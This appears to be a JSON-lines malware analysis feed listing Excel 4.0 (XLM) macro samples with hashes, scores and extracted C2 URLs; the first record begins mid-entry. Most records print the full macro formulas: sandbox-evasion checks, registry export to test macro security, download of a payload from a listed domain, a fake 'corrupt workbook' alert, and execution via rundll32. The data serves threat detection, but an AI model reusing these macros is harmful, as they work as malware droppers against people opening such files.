CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"MN8cjHKIFP\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"54eaaf2aec730774b42d7c743075323a63b552081fbb28655671e99c79d8eac0"},"analysis":{"reported":"2020-04-09T16:16:21Z","score":10},"files":[{"filename":"54eaaf2aec730774b42d7c743075323a63b552081fbb28655671e99c79d8eac0","filesize":214528,"md5":"6614ad30ab7966a0229962e5a159297e","sha1":"8cc0218ad2d3b134902ca9cdc63ccdd8c102d545","sha256":"54eaaf2aec730774b42d7c743075323a63b552081fbb28655671e99c79d8eac0","sha512":"e0beb684ae204bf093083afe67a16ac0c34ad0ce1da3de86b083db4dfa3d26838e08786006be22cdb4c944c47604a89101314f866e1d3f8217cdc3e12a855889","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"54eaaf2aec730774b42d7c743075323a63b552081fbb28655671e99c79d8eac0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"FVzAHJwKQT\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"54ec391321290a646096a4101d1f27b2b681f9ea44608f25e348669aa2f32702"},"analysis":{"reported":"2020-04-09T16:16:21Z","score":10},"files":[{"filename":"54ec391321290a646096a4101d1f27b2b681f9ea44608f25e348669aa2f32702","filesize":177152,"md5":"4605d15fbf70c55166b27a4a71943251","sha1":"cb5f8bcadd2a14395cbcd918d2d72a0bb51e3796","sha256":"54ec391321290a646096a4101d1f27b2b681f9ea44608f25e348669aa2f32702","sha512":"705b00fee1c60312f5790e23140dadba50abecd898e083ba8befcf8148bf99bc78d08c0dcc8b144e78b3d73987bca72f57b325cdf4ba298ccb65e1e20e6823c6","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"54ec391321290a646096a4101d1f27b2b681f9ea44608f25e348669aa2f32702.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\hpi5f5o.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RvQrkCoxPy\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"54eccd95124a0777c8e8a894713388014c4fd034075240ddceec7fd73da74cf9"},"analysis":{"reported":"2020-04-09T16:16:21Z","score":10},"files":[{"filename":"54eccd95124a0777c8e8a894713388014c4fd034075240ddceec7fd73da74cf9","filesize":206336,"md5":"dd7b2c16c7c2646e25cf5e22b304dc6c","sha1":"3973a5381258fa152442edf65ef6e84fae17a3f6","sha256":"54eccd95124a0777c8e8a894713388014c4fd034075240ddceec7fd73da74cf9","sha512":"5a86b14188e41fe9b7ca0a74d4ed6a633f1db95e1932bcf894e23706b260deacd55ac96642cd408e9a24e8985825a534409cfb134307f1223e9ca14fb274032b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"54eccd95124a0777c8e8a894713388014c4fd034075240ddceec7fd73da74cf9.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://rwtkoaqe.club/adfbr53g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c400, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://rwtkoaqe.club/adfbr53g\",\"c:\\Users\\Public\\bug65eh.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug65eh.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"S6weeimRES\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"55267b5fe3dad09cea0d2fae6e74c786ea71689bd9ff3ca2d3b04752792ea1ff"},"analysis":{"reported":"2020-04-09T16:16:21Z","score":10},"files":[{"filename":"55267b5fe3dad09cea0d2fae6e74c786ea71689bd9ff3ca2d3b04752792ea1ff","filesize":144384,"md5":"5da9d15747d7b55c9d89506c19aedfdd","sha1":"0de4780ec009c04b8d8a41fd654d99e4352ec752","sha256":"55267b5fe3dad09cea0d2fae6e74c786ea71689bd9ff3ca2d3b04752792ea1ff","sha512":"73aefccffa61bc6699db62ac239b10510cbbc1077d1a66f9185cefa5dcaf7252e33587490346529a2e5bea39f50c6858e7e0ca2540de5396fa97e18e55f9b9a4","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"55267b5fe3dad09cea0d2fae6e74c786ea71689bd9ff3ca2d3b04752792ea1ff.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["https://tdvomds.pw/12341324rfefv"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"lS99YPRlHL\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$23C$7\u003c770,CLOSE(FALSE),)\nIF(R$24C$7\u003c381,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nGOTO(R$53C$14)\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"552d2037d2480d80e4f9ab956396e8c31f98900afe664190f47f84bfc733e71e"},"analysis":{"reported":"2020-04-09T16:16:21Z","score":10},"files":[{"filename":"552d2037d2480d80e4f9ab956396e8c31f98900afe664190f47f84bfc733e71e","filesize":167936,"md5":"92399cdbb188926d9755d25728026d50","sha1":"7ffaa4993494c8c11aac05d8be895dbcbac39cda","sha256":"552d2037d2480d80e4f9ab956396e8c31f98900afe664190f47f84bfc733e71e","sha512":"344d15127ebb04a855611a29db75c550fd3da69957a8cb257220fc5ac592ee739c0371ea54f04418e4fb9b4aade1b6ca3ce192c20aa0b3da9e3d2184aefce84a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"552d2037d2480d80e4f9ab956396e8c31f98900afe664190f47f84bfc733e71e.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"OYQh0Oc3OA\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"553295d8a5da7ecf1d322d97aba4801a958d3eae0ae62d6f973e5eb2bdf23581"},"analysis":{"reported":"2020-04-09T16:16:21Z","score":10},"files":[{"filename":"553295d8a5da7ecf1d322d97aba4801a958d3eae0ae62d6f973e5eb2bdf23581","filesize":167936,"md5":"b6e1f4e5ece46ca69f1afdf78c7df9a8","sha1":"a73272954e81245ec995ae28542643a6165036c0","sha256":"553295d8a5da7ecf1d322d97aba4801a958d3eae0ae62d6f973e5eb2bdf23581","sha512":"50300ea3c0d3bfcdcd4814ce200d656ef385a46dbc91b0305b5db33983bb64a29794f45a6c9f317fd26253c54ce296d598b6fe08047bd59a2531baf0feb98ddd","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"553295d8a5da7ecf1d322d97aba4801a958d3eae0ae62d6f973e5eb2bdf23581.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"GJIRUH99dA\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5546671b26fdd1bc72aa12c32527a381e829139911b8461701fd1d125d6ae221"},"analysis":{"reported":"2020-04-09T16:16:21Z","score":10},"files":[{"filename":"5546671b26fdd1bc72aa12c32527a381e829139911b8461701fd1d125d6ae221","filesize":104448,"md5":"4da4eaec8164bf70a90a5d0cc9a9461f","sha1":"afd56a0e5c1d9d9566a587c53437b5e0985343f6","sha256":"5546671b26fdd1bc72aa12c32527a381e829139911b8461701fd1d125d6ae221","sha512":"8235312a9dbb637bece4387a5dd2d20fcd245af66c6f1c1bbbd7bf6899a254c42336ba2aa79143bd5dab52833bc1d6036408ed415c14bb9ad8dbfbecc7efb1b1","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5546671b26fdd1bc72aa12c32527a381e829139911b8461701fd1d125d6ae221.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Microsoft Office Webquery","c2":["http://wrjmkdod.xyz/KDHBVsd7v8"]}},{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"WORKBOOK.HIDE(\"fh3MNUZTUB\",TRUE)\nIF(GET.WORKSPACE(42),,CLOSE(TRUE))\nGET.WORKSPACE(13)\nGET.WORKSPACE(14)\nIF(R$22C$6\u003c770,CLOSE(FALSE),)\nIF(R$23C$6\u003c380,CLOSE(FALSE),)\nIF(GET.WORKSPACE(19),,CLOSE(TRUE))\nRETURN()\nRETURN()\nRETURN()"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"555e2017e7f1725dbedecb50f06da9cb574ca0bb73e801b1c4a3b1277b1d44c5"},"analysis":{"reported":"2020-04-09T16:16:21Z","score":10},"files":[{"filename":"555e2017e7f1725dbedecb50f06da9cb574ca0bb73e801b1c4a3b1277b1d44c5","filesize":168448,"md5":"4adb96abe93a50cf117ed919fc7f818f","sha1":"1f6be3e16f03b19496babe181207cf9816a34a3f","sha256":"555e2017e7f1725dbedecb50f06da9cb574ca0bb73e801b1c4a3b1277b1d44c5","sha512":"af0665cba906fc8c61d0bede1f62737723e7fe6a7ab9becd5da3cbd1ea994ce51dee96b71041917664c18ea01377b517bf7442bd64847494e9837f8856d2f82f","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"555e2017e7f1725dbedecb50f06da9cb574ca0bb73e801b1c4a3b1277b1d44c5.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://cdncloudtech.xyz/bag4hy","https://waitupdate.xyz/deg34g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://cdncloudtech.xyz/bag4hy\",\"c:\\Users\\Public\\cogp5yf.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://waitupdate.xyz/deg34g\",\"c:\\Users\\Public\\cogp5yf.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\cogp5yf.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"hDE5wLCNzN\",TRUE)\nGOTO(R$0C$11)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"55624686b7837032031107aba435c8fe5be0672e2ce87ce263bd579428d374c0"},"analysis":{"reported":"2020-04-09T16:16:21Z","score":10},"files":[{"filename":"55624686b7837032031107aba435c8fe5be0672e2ce87ce263bd579428d374c0","filesize":170496,"md5":"3d529d77955e43ae48c0c6ee4c2ab6ce","sha1":"c418c7a6a8c0d62ec388197a769bbe8e82efd924","sha256":"55624686b7837032031107aba435c8fe5be0672e2ce87ce263bd579428d374c0","sha512":"46ba7289efca0f3ccbd64d00fac04642fb883fd4ae8ba78cdb471366b6f39a2e2a59ad78892fb9af2a8c1cf6942bab58faf8f12549720b6ff88e0ca8f15d027b","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"55624686b7837032031107aba435c8fe5be0672e2ce87ce263bd579428d374c0.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\fef2fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"RyHjoi9Fz4\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"55656da36777f30417ac69f7bfc997f3eec3af66092e2b9f135bbbb451d8857b"},"analysis":{"reported":"2020-04-09T16:16:21Z","score":10},"files":[{"filename":"55656da36777f30417ac69f7bfc997f3eec3af66092e2b9f135bbbb451d8857b","filesize":214528,"md5":"ddbdb6e2bd223cb6a700914990724732","sha1":"178148cb91da56a30176d07d9e6b9ec7b05aa82c","sha256":"55656da36777f30417ac69f7bfc997f3eec3af66092e2b9f135bbbb451d8857b","sha512":"0c15e1cc5ed772b195f9845f1b18658ae9f2764978c2a1cbc96f90d41c4e18d93ddde05e4c4bb5cadbc0db8b67851fb222fa9df237e3ba5a965634dd3b718a26","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"55656da36777f30417ac69f7bfc997f3eec3af66092e2b9f135bbbb451d8857b.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://amgdorie.online/avdv43g"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://amgdorie.online/avdv43g\",\"c:\\Users\\Public\\bug75ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bug75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"VeefpVWSuE\",TRUE)\nGOTO(R$0C$18)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"5566dcb77c2dc50694a3eae71d87456c1234fb03a5fd0ead08417878909486c7"},"analysis":{"reported":"2020-04-09T16:16:21Z","score":10},"files":[{"filename":"5566dcb77c2dc50694a3eae71d87456c1234fb03a5fd0ead08417878909486c7","filesize":167936,"md5":"9f36de1eceded8d755665b6ba2c72558","sha1":"d99bca5a7bcb876536362b7ab0b771125b7e6fe7","sha256":"5566dcb77c2dc50694a3eae71d87456c1234fb03a5fd0ead08417878909486c7","sha512":"778328e8d723033107262847fb30fb028149bd0a1cdcf49785c080e2a79d72d7ad9407a41fc523a3ac9f3186157cfd52749399ffae0c2732dc38c01ccc12b588","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"5566dcb77c2dc50694a3eae71d87456c1234fb03a5fd0ead08417878909486c7.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","attr":{"formulas":"=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\gef3fff.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"1OehpZq63V\",TRUE)\nGOTO(R$0C$19)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"55720de164eb9bd914704212428360cfb66dca50fcf3d3a12bad7cd3c757dca3"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"55720de164eb9bd914704212428360cfb66dca50fcf3d3a12bad7cd3c757dca3","filesize":226304,"md5":"f3b310146952165305a51349e0496335","sha1":"12c53546ec67a536418591be1035b4137507587a","sha256":"55720de164eb9bd914704212428360cfb66dca50fcf3d3a12bad7cd3c757dca3","sha512":"e0f5d67b9ed64d5a9aae8d8f6acea4e99c5444287b7a2ecef8373049923efc1adf0f53d253003ea452f3b601d9edf4c66a48cb23d226c079bc9c6a782410b11e","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"55720de164eb9bd914704212428360cfb66dca50fcf3d3a12bad7cd3c757dca3.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://ddfspwxrb.club/fb2g424g"],"attr":{"formulas":"=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\reg.exe\",\"EXPORT HKCU\\Software\\Microsoft\\Office\\\"\u0026GET.WORKSPACE(2)\u0026\"\\Excel\\Security c:\\users\\public\\1.reg /y\",0,5)\n=WAIT(NOW()+\"00:00:03\")\n=FOPEN(\"c:\\users\\public\\1.reg\")\n=FPOS(R[-1]C, 215)\n=FREAD(R[-2]C, 255)\n=FCLOSE(R[-3]C)\n=FILE.DELETE(\"c:\\users\\public\\1.reg\")\n=IF(ISNUMBER(SEARCH(\"0001\",R[-3]C)),CLOSE(FALSE),)\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\csg75ef.html\",0,0)\n=IF(R[-1]C\u003c0,CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://ddfspwxrb.club/fb2g424g\",\"c:\\Users\\Public\\bwep5ef.html\",0,0),)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\csg75ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"NV4wcthXlL\",TRUE)\nGOTO(R$0C$17)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"558d645ae76fb7f1b72ce5690a85bb9952d600101fb771d4c2a5eac5e80d91e8"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"558d645ae76fb7f1b72ce5690a85bb9952d600101fb771d4c2a5eac5e80d91e8","filesize":152576,"md5":"81bf0244ab647b477c08157a1f0696c3","sha1":"266ba4cc86b5cb1c8add32c926510fcd69c4d90c","sha256":"558d645ae76fb7f1b72ce5690a85bb9952d600101fb771d4c2a5eac5e80d91e8","sha512":"e4a282ca9e9b214628230da44657dcb4f33bb9de91679f0a419e61db4209385f84c6491c962022699dae9de3e5db90bfa468c9efb908686b5ba7f6c1c9e42a71","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"558d645ae76fb7f1b72ce5690a85bb9952d600101fb771d4c2a5eac5e80d91e8.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://pxdgcvnsb.xyz/ajt1eg4fh"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://pxdgcvnsb.xyz/ajt1eg4fh\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"p6oBJXZ66a\",TRUE)\nGOTO(R$1C$10)"}}}]}
{"version":"0.2","sample":{"sample":"","kind":"file","target":"55919963811058ae41063cc7b2a0a91f05b3c033c975c673bf1fabe5593592ca"},"analysis":{"reported":"2020-04-09T16:16:22Z","score":10},"files":[{"filename":"55919963811058ae41063cc7b2a0a91f05b3c033c975c673bf1fabe5593592ca","filesize":113664,"md5":"39e5b9dfb53b711f2561459397043f67","sha1":"c91402189e51a013feab7b1dd9feb14cdd04ca38","sha256":"55919963811058ae41063cc7b2a0a91f05b3c033c975c673bf1fabe5593592ca","sha512":"a3d02480735e7e54925911d1d0bfcfdc8ef38fc267518a60392ddfa5d7e0dc0782f320bea75b807314d6af12f94bc48e387418229539e7763d5e8fcff1c65a8a","exts":[".xls"],"tags":["windows","office2003"],"depth":0,"kind":"file","selected":true,"runas":"55919963811058ae41063cc7b2a0a91f05b3c033c975c673bf1fabe5593592ca.xls"}],"unpack_count":0,"error_count":0,"extracted":[{"config":{"rule":"Excel 4.0 XLM Macro","c2":["https://fbknuele.pw/aagaeg4df12"],"attr":{"formulas":"=IF(GET.WORKSPACE(13)\u003c770, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(14)\u003c381, CLOSE(FALSE),)\n=IF(GET.WORKSPACE(19),,CLOSE(TRUE))\n=IF(GET.WORKSPACE(42),,CLOSE(TRUE))\n=IF(ISNUMBER(SEARCH(\"Windows\",GET.WORKSPACE(1))), ,CLOSE(TRUE))\n=CALL(\"urlmon\",\"URLDownloadToFileA\",\"JJCCJJ\",0,\"https://fbknuele.pw/aagaeg4df12\",\"c:\\Users\\Public\\bwep5ef.html\",0,0)\n=ALERT(\"The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt.\",2)\n=CALL(\"Shell32\",\"ShellExecuteA\",\"JJCCCJJ\",0,\"open\",\"C:\\Windows\\system32\\rundll32.exe\",\"c:\\Users\\Public\\bwep5ef.html,DllRegisterServer\",0,5)\n=CLOSE(FALSE)\nWORKBOOK.HIDE(\"2dwClfWjLi\",TRUE)\nGOTO(R$1C$10)"}}}]}
